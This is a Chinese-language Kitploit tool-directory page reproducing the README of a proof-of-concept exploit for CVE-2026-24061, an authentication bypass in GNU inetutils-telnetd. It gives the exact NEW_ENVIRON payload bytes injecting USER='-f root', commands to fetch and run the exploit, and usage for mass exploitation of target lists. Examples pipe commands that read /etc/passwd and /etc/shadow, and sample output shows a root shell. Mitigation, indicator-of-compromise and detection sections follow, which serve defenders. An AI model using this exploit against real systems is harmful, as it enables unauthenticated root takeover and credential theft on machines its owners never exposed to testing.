Skip to content
KitploitKITPLOIT
工具博客
提交
工具博客
提交

黑客、渗透测试和网络安全工具,武装您的安全武器库!

Kitploit 是一个黑客、网络安全和渗透测试工具的目录。发现最新的项目更新,查找漏洞、分析系统、自动化测试并加强你的安全。

··订阅源·联系·隐私·© 2026 Kitploit

工具目录

分类

查看所有分类
Loading categories
CVE-2026-24061 — 概念验证:CVE-2026-24061 是 GNU inetutils-telnetd 中的一个严重身份验证绕过漏洞,允许未经身份验证的远程攻击者通过恶意 NEW_ENVIRON telnet 选项利用,即时获得 root shell 访问权限。 | Kitploit
工具/GitHubGitHub/sh4den/cve-2026-24061
权限提升漏洞分析漏洞利用网络安全渗透测试命令与控制身份验证论文与研究学习与教育远程访问工具
GitHubsh4den/cve-2026-24061

CVE-2026-24061

概念验证:CVE-2026-24061 是 GNU inetutils-telnetd 中的一个严重身份验证绕过漏洞,允许未经身份验证的远程攻击者通过恶意 NEW_ENVIRON telnet 选项利用,即时获得 root shell 访问权限。

6132个月前尚未审核

最受欢迎

查看全部 →

发现我们社区最常用的工具。

探索所有工具

浏览我们的工具集合

查看所有工具 →
分享
查看仓库

CVE-2026-24061

GNU inetutils-telnetd - 远程认证绕过

一个用于利用 CVE-2026-24061 的安全研究工具,该漏洞是 GNU inetutils-telnetd 中的一个严重远程认证绕过漏洞,无需认证即可直接获取 root shell 访问权限。


目录

  • 漏洞摘要
  • 受影响版本
  • 技术分析
  • 前提条件
  • 安装
  • 使用方法
  • 输出参考
  • 利用方法
  • 缓解与修复
  • 入侵指标
  • 法律免责声明
  • 参考资料
  • 致谢

漏洞摘要

字段值
CVE 标识符CVE-2026-24061
CVSS v3.1 评分9.8(严重)
CVSS 向量CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
CWE 分类CWE-88:命令中参数分隔符的不当中和
厂商GNU 项目
产品inetutils-telnetd
披露日期2026 年 1 月 20 日
补丁状态待定

执行摘要

GNU inetutils-telnetd 至 2.7 版本存在一个严重漏洞,允许未认证的远程攻击者完全绕过认证并直接获得 root shell 访问权限。攻击者通过 NEW_ENVIRON telnet 选项注入一个经过特殊构造的 USER 环境变量,其值为 "-f root",从而绕过所有认证机制。

影响评估

  • 机密性:系统数据完全泄露
  • 完整性:以 root 权限完全控制系统
  • 可用性:可能导致系统被完全接管或拒绝服务
  • 影响范围:不变——利用仅影响易受攻击的 telnet 服务

受影响版本

版本范围状态
<= 2.7受影响
> 2.7补丁状态待定

技术分析

漏洞根本原因

该漏洞源于 telnetd 的 NEW_ENVIRON 选项处理器对 USER 环境变量的验证不当。在处理 NEW_ENVIRON telnet 选项时,telnetd 服务在将 USER 变量值传递给 login 进程之前未对其进行清理。攻击者将 USER 设置为 "-f root",从而注入命令行参数,强制对 root 用户的认证直接成功,而无需任何凭据。

攻击向量

  1. 攻击者连接到 telnetd 服务(通常为 23 端口)
  2. 在 telnet 选项协商期间,服务器请求 NEW_ENVIRON 数据
  3. 攻击者响应并将 USER 环境变量设置为 "-f root"
  4. 恶意参数绕过认证检查
  5. 无需任何密码提示即可直接获得 root shell
  6. 实现系统完全接管

利用复杂度

  • 前提条件:可访问目标 telnetd 服务的网络
  • 认证:无需
  • 用户交互:无
  • 攻击复杂度:低

前提条件

系统要求

  • Python 3.7 或更高版本
  • 可访问目标 telnetd 实例的网络连接
  • 执行 Python 脚本所需的足够权限

依赖项

所有依赖项均为 Python 标准库的组成部分:

包用途

安装

方法一:使用 Git

root@kitploit:~
# Clone the repository
git clone https://github.com/sh4den/CVE-2026-24061.git
cd CVE-2026-24061

# Run the exploit
python3 main.py -u <target_ip>

方法二:直接下载

root@kitploit:~
# Download the exploit
curl -O https://raw.githubusercontent.com/sh4den/CVE-2026-24061/main/main.py

# Make it executable (Linux/macOS)
chmod +x main.py

# Run the exploit
python3 main.py -u <target_ip>

方法三:手动安装

root@kitploit:~
# Ensure Python 3.7+ is installed
python3 --version

# Download and run
python3 main.py -u <target_ip>

使用方法

命令行界面

root@kitploit:~
Usage:
    python3 main.py -u <target_ip> [-p <port>] [-usr <user>]
    python3 main.py -l <targets_file> [-p <port>] [-usr <user>]
    echo "commands" | python3 main.py -u <target_ip>

Arguments:
    -u          Single target IP address or hostname
    -l          Path to file containing target IPs (one per line)
    -p          Target port (default: 23)
    -usr        User to exploit as (default: root)

单目标利用

利用单个 telnetd 实例:

root@kitploit:~
# Basic exploitation (default port 23, user root)
python3 main.py -u 192.168.1.100

# Custom port
python3 main.py -u 192.168.1.100 -p 2323

# Different user
python3 main.py -u 192.168.1.100 -usr admin

命令执行模式

以非交互方式执行命令:

root@kitploit:~
# Single command
echo "id; whoami; uname -a" | python3 main.py -u 192.168.1.100

# Multiple commands
echo "cat /etc/passwd; cat /etc/shadow" | python3 main.py -u 192.168.1.100

# Command with output redirection
echo "ps aux > /tmp/processes.txt" | python3 main.py -u 192.168.1.100

批量目标利用

从文件批量利用多个目标:

root@kitploit:~
python3 main.py -l targets.txt
python3 main.py -l targets.txt -p 2323
python3 main.py -l targets.txt -usr admin

目标文件格式(targets.txt):

root@kitploit:~
192.168.1.100
192.168.1.101
10.0.0.50
172.16.0.25
telnet.example.com

说明:

  • 每行一个目标
  • 支持 IP 地址或主机名
  • 空行将被忽略
  • 目标通过多线程并发利用

输出参考

状态指示符

示例输出

root@kitploit:~
╔═══════════════════════════════════════════════════════════════╗
║     CVE-2026-24061 - GNU inetutils-telnetd Auth Bypass        ║
║                                                               ║
║  CVSS Score: 9.8 (Critical)                                   ║
║  Impact: Remote Authentication Bypass - Instant Root Shell    ║
║                                                               ║
║          This tool is part of the HGrab Framework.            ║
╚═══════════════════════════════════════════════════════════════╝

[2026-01-23 14:32:15] [INFO] Target: 192.168.1.100:23, User: root
[2026-01-23 14:32:15] [SUCCESS] Connected to 192.168.1.100:23
[2026-01-23 14:32:15] [EXPLOIT] Sent payload: USER='-f root'
[2026-01-23 14:32:15] [INFO] Interactive mode - type commands

# id
uid=0(root) gid=0(root) groups=0(root)
# whoami
root

利用方法

Telnet 协议协商过程

该工具利用 telnet 协议的协商阶段进行漏洞利用:

  1. 初始连接:与目标端口建立 TCP 连接
  2. 选项协商:服务器发送针对各种 telnet 选项的 DO/WILL 命令
  3. TTYPE 协商:客户端同意发送终端类型(WILL TTYPE)
  4. TSPEED 协商:客户端同意发送终端速度(WILL TSPEED)
  5. NEW_ENVIRON 协商:客户端同意发送环境变量(WILL NEW_ENVIRON)
  6. 子协商:服务器请求环境变量(SB NEW_ENVIRON SEND)
  7. 载荷注入:客户端在 NEW_ENVIRON 响应中发送 USER="-f root"
  8. 认证绕过:服务器处理恶意 USER 变量
  9. Shell 访问:无需认证即可获得 root shell

载荷结构

root@kitploit:~
# Telnet IAC (Interpret As Command) = 255
# SB (Subnegotiation Begin) = 250
# SE (Subnegotiation End) = 240
# NEW_ENVIRON option = 39

payload = bytes([
    255,        # IAC
    250,        # SB
    39,         # NEW_ENVIRON
    0,          # IS
    0,          # VAR
]) + b"USER" + bytes([1]) + b"-f root" + bytes([
    255,        # IAC
    240         # SE
])

交互式会话处理

  • 输入多路复用:使用 select.select() 同时监控 socket 和标准输入
  • 非阻塞 I/O:socket 配置为非阻塞操作
  • Telnet 处理:从输出中剥离 IAC 序列以实现干净显示
  • 超时管理:命令执行采用 30 秒超时

缓解与修复

立即措施

  1. 禁用 telnetd:立即停止并禁用 telnetd 服务

    root@kitploit:~
    # systemd-based systems
    sudo systemctl stop telnetd
    sudo systemctl disable telnetd
    
    # xinetd-based systems
    sudo service xinetd stop
    sudo chkconfig telnet off
    
  2. 防火墙规则:在防火墙层面阻止 telnet 端口(23)

    root@kitploit:~
    # iptables
    sudo iptables -A INPUT -p tcp --dport 23 -j DROP
    
    # firewalld
    sudo firewall-cmd --permanent --remove-service=telnet
    sudo firewall-cmd --reload
    
  3. 网络隔离:从面向互联网的系统上移除 telnet 服务

    • 仅使用内网网段
    • 实施网络访问控制列表(ACL)

长期建议

替代方案

使用 SSH 替代 Telnet:

root@kitploit:~
# Install OpenSSH server
sudo apt-get install openssh-server  # Debian/Ubuntu
sudo yum install openssh-server      # RHEL/CentOS

# Enable and start SSH
sudo systemctl enable sshd
sudo systemctl start sshd

缓解后验证

root@kitploit:~
# Verify telnetd is not running
sudo netstat -tlnp | grep :23
sudo ss -tlnp | grep :23

# Should return no results if properly disabled

入侵指标

日志分析

检查系统日志中是否存在以下模式:

认证日志:

root@kitploit:~
# Check for unusual login patterns
sudo grep telnetd /var/log/auth.log
sudo grep telnetd /var/log/secure

# Look for suspicious USER environment variables
sudo grep "USER.*-f" /var/log/auth.log

网络日志:

  • 来自意外 IP 地址的 telnet 连接
  • 正常工作时间之外对 23 端口的连接
  • 对 telnet 服务的多次快速连接

系统痕迹

  • 以 root 身份运行的意外进程
  • 被修改的系统配置文件
  • 未授权的用户账户
  • /root/.ssh/authorized_keys 中出现新的 SSH 密钥
  • 可疑的 cron 作业或计划任务

网络指标

  • 来自 telnet 服务进程的出站连接
  • 向外部主机泄露数据
  • 反向 shell 连接
  • 来自被入侵系统的端口扫描活动
  • 向其他内部系统的横向移动尝试

检测命令

root@kitploit:~
# Check for active telnet connections
sudo netstat -antp | grep :23

# Review recent root logins
sudo last | grep root

# Check for modified system files
sudo rpm -Va  # RHEL/CentOS
sudo debsums -c  # Debian/Ubuntu

# List processes by root
sudo ps aux | grep root

# Check for unauthorized SSH keys
sudo cat /root/.ssh/authorized_keys

法律免责声明

重要提示:使用前请阅读

本工具严格仅用于:

  • 经授权的安全评估和渗透测试
  • 受控环境中的教育和研究目的
  • 经适当授权的防御性安全操作
  • 对您拥有或已获得明确测试许可的系统的漏洞评估

禁止用途:

  • 未经授权访问计算机系统或网络
  • 未经所有者明确书面同意而利用系统
  • 任何违反当地、州、联邦或国际法律的活动
  • 恶意活动或未经授权的系统入侵

责任免除:

本软件的作者、贡献者和分发者对本工具的任何滥用、损害或非法活动不承担任何责任。用户应自行负责:

  • 确保遵守所有适用的法律法规
  • 在进行安全测试前获得适当授权
  • 因使用或误用本软件而产生的任何后果

法律声明:

未经授权访问计算机系统属于严重刑事犯罪。违规者可能依据以下法律被起诉:

  • 《计算机欺诈与滥用法》(CFAA)——美国(18 U.S.C. § 1030)
  • 《1990 年计算机滥用法》——英国
  • 欧盟关于打击攻击信息系统指令
  • 全球其他司法管辖区的类似法律

处罚可能包括监禁、巨额罚款和民事赔偿责任。

使用本工具即表示您确认已阅读、理解并同意遵守本免责声明及所有适用法律。


参考资料

官方资源

  • GNU Inetutils 主页
  • GNU Inetutils 文档

漏洞信息

  • NVD - CVE-2026-24061
  • MITRE CVE 记录
  • OpenWall 披露(2026 年 1 月 20 日)
  • OpenWall 讨论(2026 年 1 月 20 日)
  • OpenWall 更新(2026 年 1 月 22 日)

相关文档

  • CWE-88:命令中参数分隔符的不当中和
  • Telnet 协议规范(RFC 854)
  • Telnet 环境选项(RFC 1408)
  • OWASP 命令注入

安全最佳实践

  • NIST 远程访问指南
  • CIS 基准
  • SANS 安全资源

致谢

  • 漏洞利用作者:IRIS C2 团队
  • 框架:HGrab 框架的组成部分
  • 发现:安全研究社区
  • 披露:OpenWall 邮件列表贡献者

更新日志

版本日期变更内容
1.0.02026-01-23初始发布

支持与联系

如有问题、缺陷或贡献意向:

  • 问题:通过 GitHub Issues 报告缺陷或请求功能
  • 安全:向维护者负责任地报告漏洞
  • 贡献:欢迎提交 Pull Request

许可证

本项目按原样提供,仅用于经授权的安全研究和教育目的。不提供任何明示或暗示的担保。请自行承担使用风险,并遵守所有适用的法律法规。

仅在获得适当授权的情况下使用

下载工具
socket网络通信
selectI/O 多路复用
sys系统交互
os操作系统接口
threading并发目标利用
datetime时间戳格式化
指示符颜色描述
[SUCCESS]绿色成功连接到目标
[EXPLOIT]绿色利用载荷已成功发送
[INFO]蓝色关于当前操作的信息性消息
[ERROR]红色连接失败、超时或利用错误
[WARNING]黄色警告消息(当前未使用)
措施优先级描述
迁移至 SSH严重使用 SSH 替代 telnet 进行远程访问
补丁管理严重监控并应用安全更新
服务审计高识别并禁用不必要的网络服务
网络分段高将关键系统与公共网络隔离
入侵检测中部署 IDS/IPS 以检测利用尝试
访问控制中为远程服务实施 IP 白名单